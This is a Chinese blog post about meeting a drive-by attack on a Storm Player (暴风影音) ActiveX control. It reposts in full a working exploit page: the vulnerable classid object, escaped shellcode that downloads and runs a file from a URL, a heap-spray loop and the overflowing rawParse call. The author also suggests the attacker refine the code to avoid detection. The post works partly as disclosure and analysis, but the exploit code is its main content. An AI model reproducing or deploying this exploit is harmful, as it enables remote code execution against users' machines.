遇到暴风影音 activeX 漏洞

最新推荐文章于 2013-06-19 16:35:00 发布
最新推荐文章于 2013-06-19 16:35:00 发布
阅读量1.2k 收藏
点赞数
文章标签: buffer javascript c object 浏览器 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FinalBruce/article/details/2008455
版权

用遨游浏览器上http://games.enet.com.cn/zhuanti/war3/遨游安全监控弹出2次,按阻止操作之后。
D:/Program Files/StormII/Storm.exe /nosplash /hidden(打开暴风影音)
然后出现大量吃内存的情况 ,吃到上1G.估计也是利用暴风影音activeX漏洞,用堆溢出的技术 ,如heap spray , 但吃内存太厉害,立刻死机,马上被察觉出来。所以代码作者应该改进一下。
查看shellcode源代码 , 却找不到 ,应该是在其他*.js文件里。
然后

网上搜到的一个帖如下。
暴风影音II 惊现0day漏洞!2007-09-09 00:09暴风影音II mps.dll ActiveX栈溢出漏洞0day !

从mopery http://hi.baidu.com/mopery 那里得到的消息,

955922.cn 旗下恶意网址群中的一个页面会下载一个恶意文件:b.htm ,该文件利用了暴风影音II mps.dll ActiveX栈溢出

漏洞0day ,


<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>

暴风影音classid

-----------------全段执行代码

<html>
<TITLE>I Love ManXue!</TITLE>
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
<body>
<SCRIPT language="javascript">
                 var shellcode = unescape("%u9090"+"%u9090"+
"%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u312f%u3732" +
"%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");
</script>
<SCRIPT language="javascript">

var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4057) buffer+="/x0a/x0a/x0a/x0a";
buffer+="/x0a";
buffer+="/x0a";
buffer+="/x0a";
buffer+="/x0a/x0a/x0a/x0a";
buffer+="/x0a/x0a/x0a/x0a";
target.rawParse(buffer);
</script>
</body>
</html>

--------------------------

关键地址

u7468%u7074%u2f3a%u312f%u3732" +
"%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");


以上执行代码所执行的程序是 http://127.0.0.1/calc.exe

 
 

FinalBruce
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
暴风影音 M3U 文件 解析漏洞
weixin_50287973的博客
10-24 426
漏洞简介 这是一个对 M3U 文件解析的漏洞,程序在读取 M3U 文件内容时未对内容长度进行有效性判断 M3U 文件简介 媒体文件的列表文件,换句话说它是媒体播放器的播放列表文件。 漏洞原理及利用分析 暴风影音可以播放不同格式的媒体文件,所以它在打开文件时必然会对文件的扩展名进行检测,由此想到可以在程序里查找“.M3U”字符串,然后在这个参考字符串上设置断点 打开poc,断下 单步到这,弹出计算器,下断,重载 跟进,继续 下断,继续 继续 strcat这没检测连接字符串长度 执行过之后,看看s
黑客榜中榜,第三期通关笔记
边城浪子的博客
09-15 624
第1关 第一关地址 http://www.cn-hack.cn/game/2/****.html ****加密部分 为以下值 e70dfb1dea416cec 解题:“e70dfb1dea416cec ”应该是加密的,扔MD5解密为“site” 第一关网址为“http://www.cn-hack.cn/game/2/site.html” 第2关 第二关地址 %68%74...
暴风影音视频加速程序模块缓冲区溢出漏洞的分析
广外女生官方BLOG
09-11 605
 受影响系统:  BaoFeng 暴风影音 2008 Beta1  描述:  ----------------------------------------------------------------------------  暴风影音是在中国非常流行的万能多媒体播放软件。  暴风影音所使用的视频加速程序模块是通过设置浏览器代理实现的,这个代理服务器(HttpServ
方便自己 也许方便他人 搜索到的挂马 clsid ——漏洞
wujackleo的专栏
07-15 983
方便自己 也许方便他人 搜索到的挂马 clsid ——漏洞2008年03月07日 星期五 13:55记性不太好 有时候遇到挂马看clsid不知道是什么漏洞 从网络巡警 超级巡警 懒人小G 余弦函数等的博客或者主页上搜集了几个 供自己查询 ^_^   本来想一个链接一下的 后来想象也许自己去搜索这些高手的博客获得的可能会更多 要查看详细的大家自己动手吧 ^_^这是realpl
网页内嵌多媒体 IE,Mozilla、Firefox、NetScape、Opera
yjfkpyu的专栏
04-10 2172
来源:http://www.phpchina.com/54842/viewspace_31724.html如果你不总是用Windows上的InternetExplorer 来上网的话,你可能会注意到,许多网站上的视频点播之类的多媒体内容,你无法直接在 Internet Explorer 以外的其它浏览器中观看,比如明明已经安装了插件却提示缺少插件,或者什么都不提示出现空的框框,或者显示了播放器
番茄花园 Ghost XP SP3 极速装机版 V2013.05
weixin_33674976的博客
06-19 186
番茄花园 Ghost XP SP3 极速装机版 V2013.05文件: FQ_Ghost_XP_SP3_2013.05.iso大小: 722915328 字节(689M)修改时间: 2013年5月22日, 10:34:36MD5: 766CEACCA23A56579C7A9E7189FF8DEASHA1: 99F7576160FB8384CEA536D3BF994BA1883...
暴风影音暴风影音暴风影音
最新发布
11-23
暴风影音】是一款知名的多媒体播放软件,专为中国用户设计,集视频播放、音频播放于一体,支持多种格式的媒体文件。其强大的兼容性使得用户无需担心文件格式问题,能够轻松享受视听盛宴。 暴风影音的主要特点: ...
暴风影音老版本.apk
03-09
暴风影音老版本
暴风影音2012版
03-24
暴风影音2012年版,适合低配置、老电脑使用,增加左眼清晰功能,耗用资源低,超级稳定。
暴风影音16.exe
03-01
暴风影音16.exe
暴风影音完整解码
04-19
在使用暴风影音时,用户可能遇到的问题包括但不限于:视频播放不流畅、音频与画面不同步、无法识别某些文件格式等。这些问题往往可以通过更新或添加缺失的解码器来解决。"暴风影音完整解码"压缩包的提供,正是为了...
网页嵌入暴风影音ActiveX
热门推荐
青椒炒蛋
05-12 1万+
    暴风影音以其解码的功能强大而著称,虽然他根本上仍是WMP的升级,但是并不是简单的升级,大量的及玛奇的加入使其使用率日益增大。   其他的网页嵌入如Windows Media Player 和RealPlayer等,使用他们开发需要很多的if判断,因为他们支持的格式各不相同,必须同时使用其中的2个以上才能达到预期的目的。但是经常关注他的会发现,他的网页嵌入应用不是太多,此文章便是为此
CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability
爱杀之爪的矩阵
08-19 2182
CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability   Author: instruder of Code Audit Labs of vulnhunt.com Time: 201
暴风影音无线团队的敏捷开发实践分享
"暴风影音的CTO杨立东在第95期CTO俱乐部活动中分享了无线互联网团队的敏捷实践,介绍了如何运用敏捷方法论提升研发效率和产品质量,以及团队如何自我驱动实现双周发版的目标。" 在杨立东的演讲中,他强调了以下几个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值